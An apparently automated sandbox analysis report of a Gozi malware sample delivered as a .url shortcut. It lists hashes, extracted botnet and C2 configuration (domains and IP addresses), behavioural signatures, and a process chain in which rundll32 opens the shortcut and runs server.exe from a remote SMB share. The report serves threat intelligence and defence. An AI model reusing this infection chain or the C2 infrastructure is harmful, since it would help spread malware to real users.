Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
08-03-2023 10:29
Static task
static1
Behavioral task
behavioral1
Sample
Direzione/Direzione.url
Resource
win7-20230220-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Direzione/Direzione.url
-
Size
191B
-
MD5
361301f6ad56d5f44ed70afcbf223df0
-
SHA1
1195b135d96ee1214531ba0c6146318f2524bea8
-
SHA256
2362e52e347d77a6b101b80057d9770e44a44599889385a83822625901631583
-
SHA512
394a2f7d97b7bd70e5827f0294deaee00a710fe931fad8a964ca6f694997de61a3dbd3f63e57a2f119733ea2150c5b1379a4f92b0d871f9714317cc67d9c8284
Malware Config
Extracted
Family
gozi
Botnet
7711
C2
checklist.skype.com
62.173.138.6
89.117.37.146
46.8.210.82
89.116.227.15
31.41.44.51
Attributes
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Extracted
Family
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4636 wrote to memory of 368 4636 rundll32.exe 84 PID 4636 wrote to memory of 368 4636 rundll32.exe 84 PID 4636 wrote to memory of 368 4636 rundll32.exe 84
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Direzione\Direzione.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4636 -
\??\UNC\46.8.210.31\Agenzia\server.exe"\\46.8.210.31\Agenzia\server.exe"2⤵PID:368
-